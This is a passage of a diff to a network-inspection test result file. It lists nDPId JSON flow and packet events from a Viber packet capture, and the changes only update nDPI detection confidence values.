+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwfM5AAEAR5cTAqAAREskEILhDHzEAHFuJ7fYJALM5kpFjAQAArBk1jI9k5Ec="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1527155670672,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670672,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwfVFAACsR+skSyQQgwKgAER8zuEMAHAAy7fYaAKwZNYyPZORHMkN8XkO4AMg="} 
@@ -108,17 +110,17 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} 
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdf+NAAEAR4d\/AqAAREskEA5UuHzEBCY\/LBbgBAAUANRj1GJhk5EcHridUEQCowC6VMgAAAEMBABABAPdbkpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAGwkdkSv31AWZshbdezAt4SmQgEbXQ8gpESKVZEPm+yytcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6SNCb6pEPHTLEjikG3nU2iKPCm3mBiaaSkNyyVaokw3bFWKZLztddqHjISoa\/0AQVn24h8Bz7MKBuS1UkASdYsAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+f+RAAEAR4r3AqAAREskEA5UuHzMAKui4BbgZADUY9RiYZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1527155679413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAuf+VAAEAR4szAqAAREskEA5UuHzEAGscOBbgRAAEAAAAuCDgEAAAHridU"} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1527155679413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwf+ZAAEAR4snAqAAREskEA5UuHzEAHM1MBbgJAPtbkpFjAQAANRj1GJhk5Ec="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwpnZAACsR0cESyQQDwKgAER8zlS4AHM86BbgaADUY9RiYZORHMkN8Xi6VAMg="} 
@@ -126,62 +128,62 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1527155685529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155685529,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8KqJAAEARjp7AqAARwKgAD8OxADUAKKNciEIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1527155685530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1527155685530,"pkt":"MAdNo1+nAA6OMNv9CABFAABMZZhAAEARU5jAqAAPwKgAEQA1w7EAOLypiEKBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAABfAATYOs1k"} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1527155685757,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"AA6OMNv9MAdNo1+nCABFAAXcfu9AAEABNMHAqAARwKgADwgA3UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1N
